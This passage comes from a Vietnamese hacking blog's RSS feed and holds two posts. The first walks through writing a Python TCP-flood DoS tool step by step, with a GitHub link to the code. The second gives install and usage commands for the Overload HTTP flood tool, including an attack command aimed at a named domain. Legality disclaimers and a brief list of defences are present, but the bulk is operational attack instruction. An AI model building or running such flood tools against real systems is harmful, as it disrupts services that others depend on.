		<link>https://anonyviet.com/huong-dan-viet-tool-ddos-don-gian-bang-python/</link>
					<comments>https://anonyviet.com/huong-dan-viet-tool-ddos-don-gian-bang-python/#comments</comments>
		
		<dc:creator><![CDATA[Hevin]]></dc:creator>
		<pubDate>Sat, 29 Jan 2022 02:40:08 +0000</pubDate>
				<category><![CDATA[DDOS]]></category>
		<category><![CDATA[bảo mật]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[tấn công mạng]]></category>
		<category><![CDATA[tấn công từ chối dịch vụ]]></category>
		<category><![CDATA[Đos]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=39246</guid>

					<description><![CDATA[Lưu ý 1: Tools này chỉ với mục đích nghiên cứu và học hỏi vui lòng các bạn không nên sử dụng tools vào các mục đích xấu và thực hiện các hành vi phạm pháp luật. Lưu ý 2: Bài viết này để các bạn làm quen với Python và các Module Python, chứ [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><span style="color: #0000ff;"><strong>Lưu ý 1: Tools này chỉ với mục đích nghiên cứu và học hỏi vui lòng các bạn không nên sử dụng tools vào các mục đích xấu và thực hiện các hành vi phạm pháp luật.</strong></span></p>
<p><span style="color: #ff0000;"><strong>Lưu ý 2:</strong> Bài viết này để các bạn làm quen với Python và các Module Python, chứ không phải viết Tool DDoS để đi tấn công người khác, khi viết xong, tuyệt đối không sử dụng Tool lên hệ thống không phải do bạn của bạn quản lý.</span></p>
<p><span style="color: #008000;"><strong>Lưu ý 3:</strong> Thật ra đây là Tool DoS, không phải DDoS, mình ghi DDoS trong tiêu đề để các bạn dễ phân biệt giữa Deny of service và MS-DOS</span></p>
<p>Hôm nay mình sẽ hướng dẫn cho các bạn cách làm tool TCP Flood đơn giản bằng Python. Đây là 1 công cụ khá là mạnh, có thể khiến máy các bạn hoặc máy các bạn mà muốn tấn công sẽ tràn ngập 1 số gói rác được gửi đến và khiến cho CPU tăng cao lên đến 100%. Nếu máy nào yếu thì chắc sẽ bị sập hoặc mua máy mới quá.</p>
<p>Trước khi vào viết tools thì mình muốn cho các bạn hiểu biết về Dos và nâng cao của DoS là DDoS. Vậy, Dos là gì? Và cách thức hoạt động của DoS ra sao? Bạn cần đọc kỹ <a href="https://anonyviet.com/tan-cong-ddos-la-gi/">bài DDOS là gì</a> trước khi thực hành nội dung bên dưới.</p>
<h2>Bắt đầu viết Tool DDoS đơn giản bằng Python</h2>
<p><b>Đầu tiên các bạn phải <a href="https://www.python.org/downloads/" target="_blank" rel="noopener">Download Python</a>. Các bạn có thể lên Youtube xem cách tải, tải Python cũng khá đơn giản lên mình cũng không hướng dẫn trong bài viết này.</b></p>
<p><strong>Cài đặt Python:</strong> ở màn hình cài đầu tiên nhớ check vào dòng<strong> <span style="color: #0000ff;">Add python x.x to path</span></strong></p>
<p><span style="font-weight: 400;">Bây giờ các bạn mở CMD trên máy Windows lên và nhập lệnh: </span><code><span style="font-weight: 400;">pip install termcolor</span></code><span style="font-weight: 400;"> , đây là thư viện màu chữ thôi, còn ai không thích có thể bỏ qua.</span></p>
<p><span style="font-weight: 400;">Do đây là Tool DoS, sử dụng tài nguyên từ Modem và PC của bạn nên chỉ hoạt động tốt trong môi trường mạng LAN, nếu tấn công ra bên ngoài thì khá yếu và đôi khi bị phản dame nhé.</span></p>
<p><span style="font-weight: 400;">Ok, giờ thì các bạn sẽ import các module sau:</span></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/01/import-module-ddos-python.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/01/import-module-ddos-python.jpg" alt="import module ddos python" width="453" height="174" title="Hướng dẫn viết Tool DDoS đơn giản bằng Python 75"></a></p>
<p><span style="font-weight: 400;">Sau khi import xong, các bạn tiến hành trang trí giao diện cho tool, cái này trang trí cho đẹp, còn ai không thích trang trí có thể vào viết code luôn.</span></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/01/code-tool-ddos-python.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/01/code-tool-ddos-python.jpg" alt="code tool ddos python" width="945" height="397" title="Hướng dẫn viết Tool DDoS đơn giản bằng Python 76"></a></p>
<p><span style="font-weight: 400;">Các bạn nào muốn trang trí giống như mình thì có thể lên google gõ từ khóa <strong>figlet online</strong> rồi vào trang web bất kì để lấy mẫu.</span></p>
<p><span style="font-weight: 400;">Như các bạn thấy đấy, câu code <code>os.system('cls')</code> đây là dòng code thực thi lệnh trên cmd của hệ thống, khi các bạn chạy tool thì câu code này sẽ xóa hết tất cả các chữ hiện có trên cmd chỉ còn lại một mình dòng chữ DOS bự chà bá to ở dưới.</span></p>
<p><span style="font-weight: 400;"> À mà còn 1 một vấn đề nữa là từ <code>colored</code> đây là 1 module của <strong>termcolor</strong> và các bạn để ý có những từ như &#8216;red&#8217;, &#8216;green&#8217;,….. ở cuối câu code thì đó là màu sắc của chữ mà bạn muốn in ra.</span></p>
<p><span style="font-weight: 400;">OK, vậy chúng ta sẽ thực hiện bước tiếp theo thôi:</span></p>
<p><span style="font-weight: 400;">Giờ chúng ta viết 1 đoạn code ngắn để lấy dữ liệu đầu vào của người dùng hay còn gọi là &#8220;input&#8221;.</span></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/01/viet-tool-ddos-python.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/01/viet-tool-ddos-python.jpg" alt="viet tool ddos python" width="811" height="187" title="Hướng dẫn viết Tool DDoS đơn giản bằng Python 77"></a></p>
<p><span style="font-weight: 400;">Tại đây, các bạn có thể tạo 1 biến bất kì, rồi chúng ta sẽ lấy input của người dùng. </span></p>
<p><span style="font-weight: 400;">Các bạn có thể thấy đấy,<code>str</code> là 1 chuỗi kí tự trong Python, nên vì các số IP thường có các chuỗi kí tự khác nhau được cách bởi dấu chấm nên mình đặt nó là &#8216;str&#8217;. Còn &#8216;int&#8217; viết tắt là</span><span style="font-weight: 400;"> </span><b>Integer </b>là<span style="font-weight: 400;"> một kiểu dữ liệu, được sử dụng </span><b>trong Python</b><span style="font-weight: 400;"> để biểu diễn các số nguyên.</span></p>
<p><span style="font-weight: 400;">Như vậy đã xong. Giờ mình sẽ tiến hành trang trí phần tấn công. Mình trang trí để nhìn cho bố đời, còn các bạn nào không thích thì bỏ qua cũng được.</span></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/01/tool-ddos-python.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/01/tool-ddos-python.jpg" alt="tool ddos python" width="951" height="456" title="Hướng dẫn viết Tool DDoS đơn giản bằng Python 78"></a></p>
<p><span style="font-weight: 400;">Ok, đây chính là giao diện code khi tool hoạt động tấn công. Câu code đầu, câu code 2 và thư viện màu chữ mình cũng đã giải thích rồi nên thôi.</span></p>
<h3><b>Giờ vào vấn đề quan trọng nhất cho tool hoạt động đây.</b></h3>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/01/cach-su-dung-ddos-python.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/01/cach-su-dung-ddos-python.jpg" alt="cach su dung ddos python" width="941" height="640" title="Hướng dẫn viết Tool DDoS đơn giản bằng Python 79"></a></p>
<p><span style="font-weight: 400;">Các bạn tiến hành tạo cho mình một hàm và 2 biến bất kì như trong hình.</span></p>
<p><span style="font-weight: 400;">Tại đây mình tạo 1 hàm tên là <code>syn()</code> và 2 biến có tên là <code>hevin</code> và <code>bb</code>.</span></p>
<p><span style="font-weight: 400;">Các bạn thấy thấy biến 1. Mình đã gọi module random có sẵn trong Python và đã import nó ở bước đầu tiên, sau từ random là từ <code>urandom</code> , cả 2 đều là hàm băm ngẫu nghiên</span> <span style="font-weight: 400;">được cài đặt một bộ tạo số giả ngẫu nhiên và chứa các hàm cho phép chúng ta giải quyết trực tiếp nhiều vấn đề lập trình khác nhau sử dụng đến tính ngẫu nhiên.</span><span style="font-weight: 400;"> Còn về biến <code>bb</code> thì mình để số nguyên là 0.</span></p>
<p><span style="font-weight: 400;">Nào, các bạn hãy tạo cho mình 1 vòng lặp <code>while True:</code></span><span style="font-weight: 400;"> đây là vòng lặp giúp 1 đoạn mã nào đó hoạt động lặp đi lặp lại cho đến khi mình muốn dừng thì thôi.</span></p>
<p><span style="font-weight: 400;">Giờ các bạn tạo 1 cặp <code>try, except</code> để bắt lỗi trong Python:</span></p>
<p><span style="font-weight: 400;">Đầu tiên mình tạo 1 biến có tên là <code>h</code> trong biến đó mình đã gọi module socket được tích hợp sẵn trong Python. Socket </span><span style="font-weight: 400;">là các endpoint c</span><span style="font-weight: 400;">ủ</span><span style="font-weight: 400;">a m</span><span style="font-weight: 400;">ộ</span><span style="font-weight: 400;">t kênh giao ti</span><span style="font-weight: 400;">ế</span><span style="font-weight: 400;">p hai chi</span><span style="font-weight: 400;">ề</span><span style="font-weight: 400;">u. Nó s</span><span style="font-weight: 400;">ử</span><span style="font-weight: 400;"> d</span><span style="font-weight: 400;">ụ</span><span style="font-weight: 400;">ng </span><span style="font-weight: 400;">để</span><span style="font-weight: 400;"> k</span><span style="font-weight: 400;">ế</span><span style="font-weight: 400;">t n</span><span style="font-weight: 400;">ố</span><span style="font-weight: 400;">i v</span><span style="font-weight: 400;">ớ</span><span style="font-weight: 400;">i m</span><span style="font-weight: 400;">ộ</span><span style="font-weight: 400;">t ch</span><span style="font-weight: 400;">ươ</span><span style="font-weight: 400;">ng trình khác ch</span><span style="font-weight: 400;">ạ</span><span style="font-weight: 400;">y trên m</span><span style="font-weight: 400;">ộ</span><span style="font-weight: 400;">t máy tính khác trên Internet. M</span><span style="font-weight: 400;">ộ</span><span style="font-weight: 400;">t ch</span><span style="font-weight: 400;">ươ</span><span style="font-weight: 400;">ng trình m</span><span style="font-weight: 400;">ạ</span><span style="font-weight: 400;">ng có th</span><span style="font-weight: 400;">ể</span><span style="font-weight: 400;"> s</span><span style="font-weight: 400;">ử</span><span style="font-weight: 400;"> d</span><span style="font-weight: 400;">ụ</span><span style="font-weight: 400;">ng nhi</span><span style="font-weight: 400;">ề</span><span style="font-weight: 400;">u socket cùng m</span><span style="font-weight: 400;">ộ</span><span style="font-weight: 400;">t lúc, nh</span><span style="font-weight: 400;">ờ</span> <span style="font-weight: 400;">đ</span><span style="font-weight: 400;">ó nhi</span><span style="font-weight: 400;">ề</span><span style="font-weight: 400;">u ch</span><span style="font-weight: 400;">ươ</span><span style="font-weight: 400;">ng trình có th</span><span style="font-weight: 400;">ể</span><span style="font-weight: 400;"> s</span><span style="font-weight: 400;">ử</span><span style="font-weight: 400;"> d</span><span style="font-weight: 400;">ụ</span><span style="font-weight: 400;">ng Internet cùng m</span><span style="font-weight: 400;">ộ</span><span style="font-weight: 400;">t lúc.</span></p>
<p><span style="font-weight: 400;">Ti</span><span style="font-weight: 400;">ếp theo là <code>h.connect</code> đây là mình kết nối với ip và port của máy tấn công</span></p>
<p><span style="font-weight: 400;">Tiếp đến là <code>h.send(hevin)</code>, mình dùng câu code này để gửi cho máy nạn nhân những thông số ngẫu nghiên từ 0 đến 900, như vậy là đủ rồi, còn các bạn nào muốn chỉnh cao hơn thì tùy ý.</span></p>
<p><span style="font-weight: 400;">Tiếp theo nữa :&gt;&gt;, chính là </span><span style="font-weight: 400;">Hàm <code>range()</code> trong Python vốn được sử dụng để tạo ra một đối tượng chứa các phần tử là dãy số gồm các số liên tiếp từ 0 đến một giá trị, mà giá trị đó không vượt qua đối số được chỉ định mà các bạn đã tạo input cho người dùng nhập</span></p>
<p><span style="font-weight: 400;">Câu code tiếp theo thì mình đã giải thích lúc nãy rồi nhé bây giờ chúng ta sẽ giải thích <code>bb+=1</code> nhé:</span></p>
<p><span style="font-weight: 400;">Câu code có thể được dịch là &#8220;thêm bất cứ thứ gì ở bên phải dấu <code>+=</code> vào biến ở bên trái dấu <code>+=</code>.</span></p>
<p><span style="font-weight: 400;">Ví dụ. Nếu bạn có</span><code><span style="font-weight: 400;">a = 10 </span></code><span style="font-weight: 400;">thì </span><code><span style="font-weight: 400;">a += 5 </span></code><span style="font-weight: 400;">sẽ là: </span><code><span style="font-weight: 400;">a = a + 5</span></code></p>
<p><span style="font-weight: 400;">Vì vậy, &#8220;a&#8221; bây giờ bằng 15.</span></p>
<p><span style="font-weight: 400;">Còn phần <code>in</code> kia mình cũng đã giải thích như trên rồi</span></p>
<h3><b>Chúng ta đến phần &#8216;except&#8217; nào</b></h3>
<p><span style="font-weight: 400;">Tại đây mình dùng <code>KeyboardInterrupt</code> để khắc phục lỗi khi dừng tool. Để tool dừng lại chúng ta nhấn tổ hợp phím <strong>Ctrl+C</strong> để dừng. Còn nếu bạn nào không thích thì các bạn dùng <code>except:</code>  thôi cũng được.</span></p>
<p><span style="font-weight: 400;">Đến phần <code>h.close()</code> mình đã gọi hàm <code>close()</code> để mỗi lần dừng lại thì tool sẽ ngừng chạy. Còn phần <code>print(….)</code> mình sẽ giải thích qua là mỗi khi bạn cho tool dừng lại thì sẽ hiện ra <code>Done</code>.</span></p>
<h3><b>Đến phần cuối cũng thôi !!!!</b></h3>
<p><span style="font-weight: 400;">Ở phần cuối là phần <code>for i in range(thread)</code> mình cũng đã giải thích cho các bạn như ở trên rồi nên bỏ qua</span></p>
<p><span style="font-weight: 400;">Tiếp đến 2 câu code cuối cũng, mình đã tiến hành gọi <code>module threads</code> được có sẵn trong Python đây là 1 module đa luồng. Như vậy ta có thể hiểu </span><span style="font-weight: 400;">Thread là một đơn vị cơ bản trong CPU. Một luồng sẽ chia sẻ với các luồng khác trong cùng process về thông tin data, các dữ liệu của mình. Việc tạo ra thread giúp cho các chương trình có thể chạy được nhiều công việc cùng một lúc.</span></p>
<p><span style="font-weight: 400;"> Không những vậy Python cung cấp thread Module và threading Module để bạn có thể bắt đầu một thread mới cũng như một số tác vụ khác trong khi lập trình đa luồng. Mỗi một Thread đều có vòng đời chung là bắt đầu, chạy và kết thúc. Một Thread có thể bị ngắt (interrupt), hoặc tạm thời bị dừng (sleeping) trong khi các Thread khác đang chạy – được gọi là yielding.</span></p>
<p>Tổng hợp Code DoS ở trên bạn có <a href="https://github.com/sonvan1811/dos?fbclid=IwAR001iKHvKchHAdObtraOxxEUbw_bJjBUfeuUk2lusQbAr_vq264BFrQ6FU" target="_blank" rel="noopener">tải từ Github</a> của mình. Nhưng mình khuyên bạn nên tập code theo hướng dẫn bên trên để hiểu hơn về Python thay vì tải sẵn về sử dụng, như vậy sẽ không nâng cao được kiến thức lập trình.</p>
<p><strong><span style="background-color: #ffffff; color: #000080; font-size: 18pt;">Cách sử dụng Tool:</span></strong></p>
<p>Sau khi làm xong, các bạn mở cmd trên máy và trỏ đến tệp mà các bạn đã đặt (name).py rồi nhập lệnh</p>
<pre data-enlighter-language="generic">python (name).py</pre>
<p>Lúc này giao diện tool của các bạn đã làm sẽ hiện trên màn hình cmd yêu cầu các bạn nhập các thông số: <strong style="background-color: #ffffff; color: #333333; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen-Sans, Ubuntu, Cantarell, 'Helvetica Neue', sans-serif; font-size: 15px;">IP máy cần tấn công</strong><span style="background-color: #ffffff; color: #333333; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen-Sans, Ubuntu, Cantarell, 'Helvetica Neue', sans-serif; font-size: 15px;">, </span><strong style="background-color: #ffffff; color: #333333; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen-Sans, Ubuntu, Cantarell, 'Helvetica Neue', sans-serif; font-size: 15px;">Port</strong><span style="background-color: #ffffff; color: #333333; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen-Sans, Ubuntu, Cantarell, 'Helvetica Neue', sans-serif; font-size: 15px;"> ( cổng ) máy tính, </span><strong style="background-color: #ffffff; color: #333333; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen-Sans, Ubuntu, Cantarell, 'Helvetica Neue', sans-serif; font-size: 15px;">Threads</strong><span style="background-color: #ffffff; color: #333333; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen-Sans, Ubuntu, Cantarell, 'Helvetica Neue', sans-serif; font-size: 15px;"> ( luồng tấn công ), </span><strong style="background-color: #ffffff; color: #333333; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen-Sans, Ubuntu, Cantarell, 'Helvetica Neue', sans-serif; font-size: 15px;">Packet</strong><span style="background-color: #ffffff; color: #333333; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen-Sans, Ubuntu, Cantarell, 'Helvetica Neue', sans-serif; font-size: 15px;"> ( số lượng gói cần gửi ).</span></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/01/ddos-lan.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/01/ddos-lan.jpg" alt="ddos lan" width="664" height="448" title="Hướng dẫn viết Tool DDoS đơn giản bằng Python 80"></a></p>
<p>&nbsp;</p>
<p><span style="font-size: 18pt; color: #ff0000;"><strong>Kết Quả Tấn Công:</strong></span></p>
<p><img decoding="async" class="  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/01/Ảnh-chụp-màn-hình-611-300x192.png" alt="Hướng dẫn viết Tool DDoS đơn giản bằng Python 26" width="669" height="428" title="Hướng dẫn viết Tool DDoS đơn giản bằng Python 81"></p>
<p>&nbsp;</p>
<p>Như các bạn thấy đấy, mình nhập thông số vô cùng thấp nhưng kết quả của cuộc tấn công đạt hiệu quả rất cao. Các bạn lưu ý khi test trên chính máy của mình đấy =)). Mình để có hơn 5s máy mình đã lên đến 76% CPU rồi</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/01/cpu-ddos-lan.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/01/cpu-ddos-lan.jpg" alt="cpu ddos lan" width="416" height="499" title="Hướng dẫn viết Tool DDoS đơn giản bằng Python 82"></a></p>
<p><b>VẬY LÀ MÌNH ĐÃ HƯỚNG DẪN CÁC BẠN XONG CÁCH VIẾT TOOL DOS BẰNG PYTHON. Hy vọng bạn sẽ bắt đầu tìm hiểu Python cơ bản với bài viết này. </b><b>Mình mong các bạn không nên sử dụng tool Dos này vào mục đích xấu thay vào đó các bạn có thể nghiên cứu cách phòng chống và ngăn chặn nhé.</b></p>
<p style="text-align: right;"><em><strong>Tác giả: <a href="https://www.facebook.com/profile.php?id=100044917478672" target="_blank" rel="noopener">Van Son</a></strong></em></p>
<h2>Câu hỏi thường gặp</h2>
<h3>Tool này có thực sự là một công cụ DDoS không?</h3>
<p>Không, tool này thực chất là một công cụ DoS (Denial of Service), chứ không phải DDoS (Distributed Denial of Service).  Bài viết sử dụng thuật ngữ &#8220;DDoS&#8221; trong tiêu đề để thu hút người đọc, nhưng nội dung bài viết giải thích rõ ràng về điểm khác biệt.</p>
<h3>Tôi có thể sử dụng tool này để tấn công các hệ thống khác không?</h3>
<p>Không nên.  Bài viết nhấn mạnh rằng tool này chỉ dành cho mục đích nghiên cứu và học hỏi. Sử dụng tool này để tấn công các hệ thống mà bạn không được phép truy cập là vi phạm pháp luật và có thể dẫn đến hậu quả nghiêm trọng.</p>
<h3>Tool này hoạt động hiệu quả như thế nào?</h3>
<p>Tool này hoạt động bằng cách gửi một lượng lớn các gói tin rác đến mục tiêu, làm quá tải hệ thống và gây ra tình trạng gián đoạn dịch vụ. Hiệu quả của tool này phụ thuộc vào cấu hình của máy chủ mục tiêu và mạng lưới của bạn.  Nó hoạt động tốt hơn trong mạng LAN.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/huong-dan-viet-tool-ddos-don-gian-bang-python/feed/</wfw:commentRss>
			<slash:comments>20</slash:comments>
		
		
			</item>
		<item>
		<title>Cách DDoS Layer 7 bằng Overload thử sức chịu tải của Website</title>
		<link>https://anonyviet.com/cach-ddos-layer-7-bang-overload-thu-suc-chiu-tai-cua-website/</link>
					<comments>https://anonyviet.com/cach-ddos-layer-7-bang-overload-thu-suc-chiu-tai-cua-website/#comments</comments>
		
		<dc:creator><![CDATA[Wdchocopie]]></dc:creator>
		<pubDate>Mon, 30 Aug 2021 09:46:07 +0000</pubDate>
				<category><![CDATA[DDOS]]></category>
		<category><![CDATA[overload]]></category>
		<category><![CDATA[tấn công từ chối dịch vụ]]></category>
		<category><![CDATA[thử sức chịu đựng website]]></category>
		<category><![CDATA[Website]]></category>
		<category><![CDATA[Đos]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=33333</guid>

					<description><![CDATA[Dạo gần đây, Anonyviet có đăng 1 số hướng dẫn về cách tạo Website như NextCloud hay X-ui nhưng đã bao giờ anh em nghĩ tới việc là website của mình có thể dính những cuộc tấn công từ chối dịch vụ hay là website bị quá tải lượng truy cập chưa? Hôm nay mình [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Dạo gần đây, Anonyviet có đăng 1 số hướng dẫn về cách tạo Website như <a href="https://anonyviet.com/huong-dan-su-dung-nextcloud-toan-tap/">NextCloud</a> hay <a href="https://anonyviet.com/tao-server-vps-rieng-de-hack-data-4g-mien-phi/">X-ui</a> nhưng đã bao giờ anh em nghĩ tới việc là website của mình có thể dính những cuộc tấn công từ chối dịch vụ hay là website bị quá tải lượng truy cập chưa? Hôm nay mình sẽ hướng dẫn các bạn cách để thử sức chịu đựng website của mình sử dụng Overload DDoS Layer 7và cách phòng tránh 1 cuộc tấn công từ chối dịch vụ</strong></p>
<h3>Tại sao phải thử sức chịu đựng website của bạn?</h3>
<p>Mỗi một Website thì sẽ có các host khác nhau. Việc Website của bạn có khả năng chống chịu được đến bao nhiêu phụ thuộc hoàn toàn vào tài nguyên của host của Website. Khả năng Website có thể chịu được ảnh hưởng trực tiếp tới lượng người truy cập vào Website tại 1 thời điểm hay chính xác là liên quan trực tiếp tới số HTTP Request của trang Web</p>
<p>Nếu 1 trang web vượt quá số lượng HTTP request nó thì có thể gây ra gián đoạn trong việc truy cập website của người dùng hay cụ thể là bạn không thể kết nối tới trang Web. Khi đó máy chủ sẽ phản hồi với lỗi những lỗi 5XX. Các lỗi 5XX có thể gặp bao gồm: 500 tới 505.</p>
<p>Đối với những doanh nghiệp hay người dùng đều không muốn gặp vấn đề này và vì vậy việc kiểm tra sức chịu đựng của website của bạn là rất quan trọng. Trong bài viết này, mình sẽ sử dụng 1 tool Dos đơn giản với phương thức Request HTTP. Đối với anh em nào chưa biết Dos / DDos là gì thì có thể xem thêm bài: GoldenEye &#8211; Tool test sức chịu đựng website của mình <a href="https://anonyviet.com/goldeneye-tool-kiem-tra-suc-chiu-dung-dos-cua-website/">tại đây</a> nhé!</p>
<h3>Một số lưu ý trước khi thực hiện</h3>
<ul>
<li>Tuyệt đối không Dos / DDos Anonyviet và những Website bạn không thuộc quyền sở hữu hay quản lý. Anonyviet sẽ không chịu trách nhiệm với các hành vi phá hoại của các bạn.</li>
<li>Overload là 1 tool nhẹ và chỉ sử dụng phương thức HTTP nên sẽ không gây ngốn tài nguyên máy như <a href="https://anonyviet.com/goldeneye-tool-kiem-tra-suc-chiu-dung-dos-cua-website/">GoldenEye </a>nhưng mình khuyến khích sử dụng mạng có đường truyền cao hay kết nối máy tính với Router thông qua dây mạng để đạt được hiệu quả cao nhất.</li>
</ul>
<h3>Nền tảng Tool có thể hoạt động</h3>
<ul>
<li>Window</li>
<li>Linux</li>
<li>Termux</li>
</ul>
<h3>Hướng dẫn sử dụng Overload để thử sức chịu đựng của Website</h3>
<div class="alert alert-success"><span style="color: #ff0000;"><strong>Chú ý! Chỉ thực hiện Test DDOS trên Website hoặc Server của bạn làm chủ. Mọi hành vi DDOS vào Website của người khác hoặc tổ chức khác đều vi phạm pháp luật.</strong></span></div>
<h4>Cài đặt Overload Trên Window</h4>
<p><strong>Bước 1</strong>: Các bạn cài đặt Python bản mới nhất<a href="https://www.python.org/downloads/release/python-38" target="_blank" rel="noopener"> tại đây</a>.</p>
<p><strong>Bước 2</strong>: Sau khi chạy xong, các bạn Click chuột phải vào MyPC và chọn Properties -&gt;  Advanced system settings -&gt;  Environment Variables  -&gt; Tìm ở mục <code>System variables</code> phần Path -&gt; click Edit -&gt; Bấm new -&gt; nhập dường dẫn của Python vào.</p>
<p>Hoặc các bạn có thể tich vào phần Add Python to PATH khi đang SetUp</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/08/0001_add_Python_to_Path.png" alt="ADD python to PATH window" width="672" height="417" title="Cách DDoS Layer 7 bằng Overload thử sức chịu tải của Website 86"></p>
<p><strong>Bước 3</strong>: Tải Tool DDoS Overload của 7zx <a href="https://github.com/7zx/overload" target="_blank" rel="noopener">tại đây.</a></p>
<p><strong>Bước 4</strong>: Vào CMD hoặc Powershell, di chuyển vào thư mục vừa download</p>
<p><strong>Bước 5</strong>: Ghi lệnh sau để tải PIP cần thiết:</p>
<p><code>pip install -r requirements.txt</code></p>
<h4>Sử dụng DDOS Layer 7 Overload trên Linux</h4>
<p><strong>Lưu ý</strong>: các bạn nên cấp quyền Super User cho terminal nhé!</p>
<p><strong>Bước 1</strong>: Các bạn cập nhật Linux bằng lệnh sau:</p>
<p><code>sudo apt update</code></p>
<p><strong>Bước 2:</strong> Tải Python về Linux</p>
<p><code>sudo apt install python3 python3-pip git -y</code></p>
<p><strong>Bước 3</strong>: Tải Overload từ github về sử dụng lệnh git</p>
<p><code>git clone https://github.com/7zx/overload</code></p>
<p>Đối với các bạn chưa có git thì có thể tải sử dụng câu lệnh sau</p>
<p><code>sudo apt install git-all</code></p>
<p><strong>Bước 4</strong>: Các bạn vào thư mục của Overload bằng cách nhập</p>
<p><code>cd overload</code></p>
<p><strong>Bước 5</strong>: Ghi lệnh sau để tải PIP cần thiết:</p>
<p><code>pip3 install -r requirements.txt</code></p>
<p>Nếu anh em chưa có PIP3 thì sử dụng câu lệnh sau đây để tải về</p>
<p><code>sudo apt-get update -y &amp;&amp; sudo apt-get install python3-pip -y</code></p>
<h4>Cài đặt DDos OverLoad trên Termux</h4>
<p>Trước tiên, bạn cần có kiến thức về cài đặt và <a href="https://anonyviet.com/cach-dung-termux-de-cai-phan-mem-hack-tren-dien-thoai-android/">sử dụng Termux trên Android</a>. Sau đó thực hiện các bước sau:</p>
<p><strong>Bước 1</strong>: Các bạn cập nhật Termux bằng lệnh sau:</p>
<p><code>pkg update</code></p>
<p><strong>Bước 2:</strong> Tải Python về Linux</p>
<p><code>pkg install python3 python3-pip git -y</code></p>
<p><strong>Bước 3</strong>: Tải Overload từ github về sử dụng lệnh git</p>
<p><code>git clone https://github.com/7zx/overload</code><code></code></p>
<p><strong>Bước 4</strong>: Các bạn vào thư mục của Overload bằng cách nhập</p>
<p><code>cd overload</code></p>
<p><strong>Bước 5</strong>: Ghi lệnh sau để tải PIP cần thiết:</p>
<p><code>pip3 install -r requirements.txt</code></p>
<h3>Sử dụng Overload</h3>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/08/a-109.jpg" alt="Tool Overload Help " width="650" height="509" title="Cách DDoS Layer 7 bằng Overload thử sức chịu tải của Website 87"></p>
<p>Cú pháp câu lệnh:<br />
<code>python3 overload.py [-h] [--target &lt;URL&gt;] [--method &lt;HTTP&gt;] [--time &lt;time&gt;]</code><br />
<code>[--threads &lt;threads&gt;]</code></p>
<p><strong>Trong đó</strong></p>
<p><strong>-h</strong> hay <strong>&#8211;help</strong> : hiển thị mục help của overload</p>
<p><strong>&#8211;target &lt;URL&gt;</strong>: mục tiêu mà bạn muốn nhắm tới</p>
<p><strong>&#8211;method &lt;HTTP&gt;</strong>: kiểu tấn công</p>
<p><strong>&#8211;time &lt;giây&gt;</strong>: Thời gian chạy tool</p>
<p><strong>&#8212; thread &lt;luồng&gt;</strong>: số luồng trên giây &lt;tối đa 200&gt;</p>
<p><strong>Ví dụ </strong></p>
<p><code>python3 overload.py --target vietnamconghoa.us --method HTTP --time 500 --thread 200</code></p>
<p>Trong câu lệnh vừa rồi mình sử dụng Max thread xem web mình còn sống không và sau đây là kết quả</p>
<p><img decoding="async" class="alignnone size-full " src="https://anonyviet.com/wp-content/uploads/2021/08/a-110.jpg" alt="Error 502 wordpress" width="783" height="390" title="Cách DDoS Layer 7 bằng Overload thử sức chịu tải của Website 88"></p>
<p>Nhờ vậy mà mình biết là website của mình khá là dễ chết. Sau đây là cách để phòng chống các cuộc tấn công từ chối dịch vụ</p>
<h3>Các cách để phòng chống DDOS / DOS</h3>
<h4>Biện pháp kĩ thuật</h4>
<ul>
<li>Tăng cường khả năng xử lí hệ thống</li>
<li>Tối ưu hóa thuật toán</li>
<li>Nâng cấp máy chủ</li>
<li>Nâng cấp băng thông</li>
<li>Cài đặt đầy đủ các bản vá lỗi từ server</li>
<li>Sử dụng tường lửa</li>
</ul>
<h4>Công cụ phòng chống DDOS</h4>
<ul>
<li>Dùng hệ thống thiết bị, phần mềm hoặc dịch vụ giám sát an toàn mạng</li>
<li>Dùng thiết bị bảo vệ mạng có dịch vụ chống tấn công DDoS</li>
<li>Tường lửa cứng hoặc tường lửa mềm</li>
</ul>
<p><strong>Vậy là Anonyviet vừa hướng dẫn các bạn cách test khả năng chịu đựng của website bằng tool DDOS Layer 7 overload đồng thời cách phòng chống Dos / Ddos. Các bạn có ý tưởng gì thì hãy đừng ngần ngại mà hãy gửi ngay cho <code>anonyviet.com@gmail.com</code> nhé.</strong></p>
<div id="gtx-trans" style="position: absolute; left: 663px; top: 4861.08px;">
